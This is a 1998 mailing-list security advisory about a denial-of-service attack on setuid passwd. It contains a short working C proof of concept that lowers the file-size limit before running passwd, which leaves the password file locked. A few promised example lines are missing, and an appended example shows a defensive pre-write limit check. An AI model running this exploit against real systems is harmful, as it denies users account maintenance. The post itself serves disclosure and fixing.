
resource starvation against passwd(1)

X-RDate: Mon, 23 Feb 1998 10:23:07 +0500 (ESK)
Date: Sun, 22 Feb 1998 17:18:11 GMT
From: Antonomasia <ant@NOTATLA.DEMON.CO.UK>
Subject: resource starvation against passwd(1)

Standard apology if old...

This demonstrates a resource starvation attack on the
setuid root passwd(1) program.  In the case I tested it was the
Red Hat Linux passwd-0.50-7 program without shadowing.

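#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl, *rlp = &rl;

    /* cap the size of any file this process may write */
    rlp->rlim_cur = 4000;
    rlp->rlim_max = 4000;
    setrlimit(RLIMIT_FSIZE, rlp);
    /* resource limits are inherited across exec */
    execl("/usr/bin/passwd", "passwd", (char *) 0);
    perror("execl");
    return 1;
}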

The resource being restricted is filesize, and if the passwd file is
large enough it cannot be written back and the passwd program dies.
This leaves the passwd file locked against further password changes -
a denial of service attack.

I was unable to write back an incomplete passwd file during my tests,
but I can imagine some systems allowing this, in which case you could
aim for an incomplete last line like this

which could be awkward if any authentication programs interpret it as

A suggested fix is for the passwd program to be aware of the size of
the file before writing, and to quit if failure is predicted.

There are obviously other resources that could be restricted, and there
may be a case for increasing limits on cpu time or file descriptors,
or even filesize to ensure successful completion.

# Antonomasia                      #
# See                        #
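
The suggested fix above (know the size before writing, quit if failure is predicted, or raise the limit) could look like the following. This is an added example, not code from the original post or from any passwd implementation; plan_fsize, ensure_fsize and the 6000-byte size are hypothetical names and values chosen for illustration.

```c
/* Added example: pre-flight RLIMIT_FSIZE check for a privileged program
 * that is about to rewrite a file whose new size is already known. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/resource.h>

enum fsize_plan { FSIZE_REFUSE = -1, FSIZE_OK = 0, FSIZE_RAISE_SOFT = 1 };

/* Decide what to do for a write of `needed` bytes under the limits in `rl`. */
enum fsize_plan plan_fsize(const struct rlimit *rl, off_t needed)
{
    if (needed < 0)
        return FSIZE_REFUSE;
    if (rl->rlim_cur == RLIM_INFINITY || (rlim_t)needed <= rl->rlim_cur)
        return FSIZE_OK;               /* soft limit already large enough */
    if (rl->rlim_max == RLIM_INFINITY || (rlim_t)needed <= rl->rlim_max)
        return FSIZE_RAISE_SOFT;       /* any process may raise soft up to hard */
    return FSIZE_REFUSE;               /* inherited hard limit is too small */
}

/* Call before taking the lock. Returns 0 if the write can complete,
 * -1 if the caller should quit without touching the file. */
int ensure_fsize(off_t needed)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_FSIZE, &rl) != 0)
        return -1;
    switch (plan_fsize(&rl, needed)) {
    case FSIZE_OK:
        return 0;
    case FSIZE_RAISE_SOFT:
        rl.rlim_cur = rl.rlim_max;
        return setrlimit(RLIMIT_FSIZE, &rl) == 0 ? 0 : -1;
    default:
        return -1;
    }
}

int main(void)
{
    /* 6000 is a constructed size; a real caller passes the new file's length. */
    printf("ensure_fsize(6000) -> %d\n", ensure_fsize(6000));
    return 0;
}
```

Run under the 4000-byte limits set by the program in the post, a 6000-byte rewrite is refused before any lock is taken.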
